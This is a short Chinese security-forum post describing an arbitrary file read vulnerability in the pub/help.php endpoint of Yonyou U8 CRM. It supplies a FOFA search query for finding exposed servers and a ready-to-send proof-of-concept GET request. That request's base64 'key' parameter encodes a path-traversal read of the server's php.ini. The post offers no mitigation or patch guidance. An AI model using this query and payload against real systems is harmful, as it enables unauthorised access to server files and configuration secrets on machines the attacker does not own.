友crm客户关系管理pub/help.php接口存在任意文件读取漏洞-网络安全论坛-网络安全-阻击者联盟

友crm客户关系管理pub/help.php接口存在任意文件读取漏洞

勾八徽章-原创达人-阻击者联盟等级-LV2-阻击者联盟8个月前发布
120

用友U8客户关系管理全面解决方案是基于中国企业最佳营销管理实践,更符合中国企业营销管理特点,客户关系管理的整合营销平台。用友crm pub/help.php接口存在任意文件读取漏洞。

9c212d799a2b9bab8fb654b5f03d01d1

 

FoFa语句:

body="用友 U8CRM"

97ebad861bf405ef51428467ce4acc3e

 

Poc:

GET /pub/help.php?key=YTozOntpOjA7czoyNDoiLy4uLy4uLy4uL2FwYWNoZS9waHAuaW5pIjtpOjE7czoxOiIxIjtpOjI7czoxOiIyIjt9 HTTP/1.1
Host: xx.xx.xx.xxx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

4869b9eda4b0da12721e5066f180b2e6

 

评分
欢迎为Ta评分
分享
请登录后发表评论

    没有回复内容

zibll子比主题
本站同款主题模板
zibll子比主题是一款漂亮优雅的网站主题模板,功能强大,配置简单。
查看详情
发布文章发布帖子
扫码添加微信-阻击者联盟
在手机上浏览此页面